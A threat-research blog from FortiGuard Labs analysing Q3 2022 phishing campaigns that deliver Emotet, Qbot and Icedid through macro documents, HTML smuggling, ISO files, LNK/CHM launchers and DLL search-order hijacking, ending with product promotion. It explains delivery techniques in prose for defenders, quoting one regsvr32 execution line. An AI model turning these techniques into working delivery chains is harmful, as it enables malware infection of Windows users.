FortiGuard Labs Threat Research
Entering the second half of 2022, phishing attacks and campaigns continue to be the top threats targeting organizations, using a variety of techniques to infect users and organizations. Following our observations posted last quarter, FortiGuard Labs has continued to track many malware families, including Emotet, Qbot, and Icedid. We continually find malicious files delivered via phishing emails using Microsoft Excel files, Microsoft Word Documents, Windows shortcut files, and ISO image files to deliver their malware.
To help organizations better identify and prevent phishing attacks and infections, this blog provides some of the most common details and techniques used by these malicious files for malware deployment.
Affected Platforms: Microsoft Windows
Impacted Users: Windows users
Impact: Controls victim's devices, collects sensitive information, and delivers other malware
Severity Level: Critical
Phishing emails combined with social engineering continue to be the most common malware campaign strategy. Similar to previous quarters, the phishing emails we have tracked in Q3 of 2022 include a malicious file attachment or a link to a malicious site that downloads a malicious file. We have also observed a technique known as HTML Smuggling—an evasive malware delivery technique widely used to create a password-protected ZIP file and save it on a victim's device. This could be an HTML Smuggling attachment or an HTML Smuggling link. Both open in the browser, resulting in the download of a malicious file or files.
Figure 1 shows an HTML Smuggling file attached to an email. Once opened, a password-protected ZIP file is dropped, and the password in the email is required to unzip it.
Figure 2 showcases another HTML Smuggling attachment. It is disguised as an Adobe PDF document download page and uses a simple lure to get its victim to open the local downloaded file. The password to unzip the downloaded ZIP file is displayed on the page instead of in the body of the email.
Three samples we captured between July and September of 2022 were active in malware campaigns and provide good examples of what we have been observing. Many are familiar, some are new, and others are older attacks with a new twist. The first is an Excel file with Excel 4.0 macros using the same macros and behaviors as a sample we described in our Q2 update. The second is new. It is a Word Document with VBA macros. The third sample is an ISO file we disclosed in our Q2 blog, but this time there are changes to the included files and the techniques used.
Emotet campaigns containing malicious Excel attachments have been observed since November 2021. The appearance of Excel files and malware payloads are constantly changing to evade detection. We captured this latest sample in July. As the analysis in this previous blog shows, this sample uses macros to download and execute malware payloads.
Figure 3 shows an Excel 4.0 Macro sheet, “Sheet 7," which includes a malicious formula. Cell F2 in this Macro sheet is named "Auto_Open" to automatically run the formula once the file is opened. When the macros are enabled, several formulas are written into the cells to execute. Then the API "URLDownloadToFileA" is called to download the malware files, and "regsvr32.exe" is used to execute the malware payloads.
This second sample is a Word document using VBA macros to drop an Icedid malware DLL file. Figure 4 shows a screenshot of this opened Word document. It displays a blurred document image behind an Italian language request for the victim to click the "Enable Content" button in the security warning bar.
The VBA code shown in Figure 5 is a function that gets its text from a custom XML file in "customXml/item1.xml". The grabbed text is a long string starting with "4d5a", indicating that this is a PE file. Figure 6 shows the "Document_Open()" function. It converts the text to a byte data type and writes to a file called "c:\ProgramData\xxx.dll" once the Word document is opened. Next, "rundll32.exe" is called to load this malicious DLL file.
ISO files became a popular vehicle for malware deployment this summer. The malware families involved were Qbot, Icedid, and Bumblebee. We captured several malicious ISO files containing different files, as described below.
The contents of this ISO file are shown in Figure 7. A PNG file and an LNK file is disguised with an image icon. The target of this LNK file is a command line that, after opening the image file, uses “curl.exe” to download a malware DLL file and execute it using “rundll32.exe”.
This ISO file contains an LNK file and a folder named “one”, which includes a BAT file, JS file, TXT file, and an empty folder. This sample uses multiple script files to obfuscate the execution of the malware DLL. As shown in Figure 9, the LNK file executes "alsoThing.bat" from folder "one". Next, the file "weTo.js" is executed with four arguments by the BAT file. In the JS file, "rundll32.exe" is used to run "thenTake.txt", which is actually a malware DLL file with a .txt extension.
This ISO file contains a CHM (Compiled HTML Help) file and a DLL file, as shown in Figure 10. A script snippet is appended to the end of the CHM file. Once started, it executes the script and uses "rundll32.exe" to launch the malicious file "app.dll".
Figure 11 shows that an ISO file contains an LNK file and three hidden files ("WindowsCodecs.dll", "102755.dll", and "calc.exe"). First, the LNK file runs "calc.exe", a legitimate file. On startup, "calc.exe" loads several dependencies, including a file named "WindowsCodecs.dll". As you can see, one of the filenames in this ISO file is the same.
It then uses a technique called DLL Search Order Hijacking. If loading a DLL file without specifying a full file path, it uses the standard search order to find it.
In this case, the "WindowsCodecs.dll" in the ISO file is in the same folder as the executable application. As a result, it loads this version instead of the valid one in the Windows directory. This loaded library is a malicious copy that creates a process to execute the malware "102755.dll", as shown in Figure 12.
Figure 13 shows a screenshot of the process where "calc.exe" loads the malicious "WindowsCodecs.dll" from the ISO file. After that, it creates a process for "regsvr32.exe" using the command line "C:\Windows\SysWOW64\regsvr32.exe 102755.dll".
To provide an overview of malware delivery, we have illustrated the execution flow of their implementation. Below is the delivery chain for each malware family, including Emotet, Qbot, and Icedid.
All deliveries start with a phishing email that attaches a malicious file or contains a download link. Emotet uses an Excel file as a downloader to drop the Emotet malware payload and then execute it.
Figure 15 shows the Qbot installation chain. The malicious ISO file is either extracted from an HTML Smuggling file or downloaded from a malicious link. The files contained in the ISO file vary and result in different executions. Each execution is triggered by clicking on an LNK file contained in the ISO file. The following steps in the process can include a download, tricks like obfuscated scripts, and DLL search order hijacking. Ultimately, the Qbot malware payload can run in any of these ways.
As shown in Figure 16, the execution chains of Icedid and Qbot are similar. The ISO file plays an essential role in the chain. The difference is an original way of using a CHM file to run the Icedid malware payload. In addition, a malicious Word document attachment is involved in dropping and executing the payload.
Over the past three months, we have seen a significant reduction in malware campaigns compared to the first half of the year. Since discovering an Emotet campaign in mid-July, nothing has been seen. Qbot activity also stopped in mid-July before resuming its spread in September. And while Icedid malware distribution has been continuous, it has not been as frequent.
According to our recent observations, the most active files for malware delivery are disk image files like the ISO files described in this report. They take advantage of bypassing the Mark-of-the-Web trust control to evade antivirus detection. Moreover, they can be easily mounted and opened on modern versions of Windows with just a double click. In addition to the ISO files mentioned above, organizations are cautioned to watch for other formats of image files, such as IMG and VHD files, which can also be used to deliver malware.
The HTML Smuggling technique is used to bypass restrictions on receiving files from the Internet by creating files locally. The execution triggers are covered by LNK files and CHM files, as they can be easily launched with a simple double-click.
At the same time, Microsoft Office files with macros continue to be distributed, though usually in small numbers. Interestingly, threat actors do not appear to have stopped working on Word documents and Excel files despite Microsoft adding more restrictions on the use of macros.
Although malware distribution has constantly been changing, with new updates and techniques regularly being added, all the attacks we have observed started with phishing emails. As a result, it is vital to be aware of social engineering, including training end users, to avoid these threats.
Fortinet customers are protected from the malware described in this report by FortiGuard’s Web Filtering, AntiVirus, FortiMail, FortiClient, FortiEDR, and Content Disarm & Reconstruction (CDR) services as follows.
The FortiGuard CDR service disarms the phishing emails with their attached malicious files.
FortiEDR detects the involved files as malicious based on their behavior.
Fortinet customers are protected from these malicious files and malware by FortiGuard Antivirus, which is included in FortiMail. FortiMail also detects phishing emails and can block or disarm attachments.
All malicious samples described in this report are detected by FortiGuard AntiVirus as follows:
The malware payloads are detected by FortiGuard AntiVirus as follows:
Fortinet’s Digital Risk Protection Service, FortiRecon, continually monitors for credentials stolen using Stealers (such as Redline) being sold by threat actors on the dark web that can be used to breach a network. Request a test drive to see how FortiRecon can provide an early warning of imminent threats to your network and data.
In addition, Fortinet has multiple solutions designed to train users on how to understand and detect phishing threats:
Our turnkey Security Awareness Training SaaS service helps organizations deliver regular, timely training on cybersecurity threats such as phishing to their end-users.
The FortiPhish Phishing Simulation Service provides additional, ongoing training by using real-world simulations to help organizations test user awareness and vigilance to phishing threats and train and reinforce proper practices when users encounter targeted phishing attacks.
We also suggest that organizations have their end users undergo our FREE NSE training: NSE 1 – Information Security Awareness that includes a module on Internet safety and phishing.
Learn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.